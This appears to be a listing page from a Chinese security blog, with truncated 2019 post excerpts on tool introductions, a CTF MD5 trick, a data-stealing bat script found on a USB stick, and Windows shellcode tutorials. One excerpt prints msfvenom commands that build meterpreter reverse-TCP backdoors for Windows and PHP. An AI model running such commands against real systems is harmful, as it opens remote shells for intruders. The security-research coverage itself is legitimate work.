黑白直播信息安云
2019-10-28
前言基于ThinkPhp5.0+Vue+EasyWeChat 开发的一套CRMEB新零售商城系统CRMEB系统就是集客户关系管理+营销电商系统,能够真正帮助企业基于微信公众号、小程序、wap、pc、app等,实现会员管理、数据分析,精准营销的电子商务管理系统。可满足企业新零售、批发、分销、预约、O2O、多店等各种业务需求正文CRMEB默认会记录网站数据包并存...
黑白直播信息安云
2019-10-28
FwAnalyzer是一个使用一组可配置规则分析(ext2/3/4),FAT/VFat,SquashFS,UBIFS文件系统镜像和目录内容的工具。FwAnalyzer依赖于e2tools用于ext文件系统,mtools用于FAT文件系统,squashfs-tools用于SquashFs文件系统,ubi_reader用于UBIFS文件系统。对ext2/3/4镜...
黑白直播信息安云
2019-10-01
前言DNSlivery是一款使用DNS作为传输协议将文件传递到目标的工具。特点1.执行或上传文件到目标机器2.目标上的不需要任何客户端3.不需要完整的DNS服务器它可以轻松地将文件或payload传送到受损目标,不需要使用传统的Web传输,无需专用客户端软件。这适用于禁止传出Web流量的受限环境。虽然现在已经存在更完整的DNS隧道工具(比如 dns...
黑白直播信息安云
2019-08-08
在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。对就是这货怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.但是好像没有卵用.正好小表弟好像对这个比较了解,我去问问他咋回事儿小表弟下班回家后给我发了这么一段消息嗯…这是个bat脚本,他会打包本机的一些数据到一个文件夹里并全部发送到服务器上,然后删除痕迹和自身防...
黑白直播信息安云
2019-08-08
背景CTF有个特别狗,也特别烦的东西,就是MD5截断验证,今天我就遇到了.正文嗯,举个栗子啥意思呢?就是说,验证明文(Code)+随机字符串(fTyHgZII)在md5加密之后截取前六位等于b77333来,看效果注释有了,按题目需求,直接改代码import hashlibaddStr = ‘lll’ #加起来的字符串knowMd...
黑白直播信息安云
2019-08-08
生成exe后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe生成PHP后门msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php使用监听模...
黑白直播信息安云
2019-07-22
cloud-security-audit是一款适用于AWS的命令行安全审计工具。它可以帮助你扫描AWS账户中的漏洞,你将能够快速识别基础架构中不安全的部分,并执行对AWS账户的审计工作。安装目前,Cloud Security Audit不支持任何的软件包管理器,目前正在完善这项工作。从源构建首先,你需要将Cloud Security Audit下载到GO工作...
黑白直播信息安云
2019-07-20
MiteruMiteru是一款实验性网络钓鱼检测工具,广大研究人员可以使用这款工具来进行网络钓鱼工具的感染检测。工具运行机制该工具可以从下列来源收集钓鱼URL地址:1、 CertStream-Suspicious feed2、 OpenPhish feed3、 PhishTank feed4、 Ayashige fee...
黑白直播信息安云
2019-07-13
脆弱目标检测工具v1.0.0.2 功能介绍#bug修复1.修复shodan 提取IP只能提取一页 原因参数填写错误。2.修复fofa vip等级较高的情况下提取ip一页。#未修复bug 1.不能在shodan 输入漏洞关键词中添加数字。#功能更新1.添加win10 皮肤2.添加censys api 接口#友情说明1.可能该工具不支持老系统如 Win...
黑白直播信息安云
2019-07-02
很久以前我写过三篇关于如何编写Windows shellcode(x86 - 32位)的详细博客文章。文章初学者友好,包含很多细节。第一部分解释什么是shellcode,哪些是它的局限性,第二部分解释了PEB(进程环境块),PE(可移植可执行文件)文件格式和ASM(汇编程序)的基础知识,第三部分说明了Windows shellcode如何实际实现。这篇博客文...
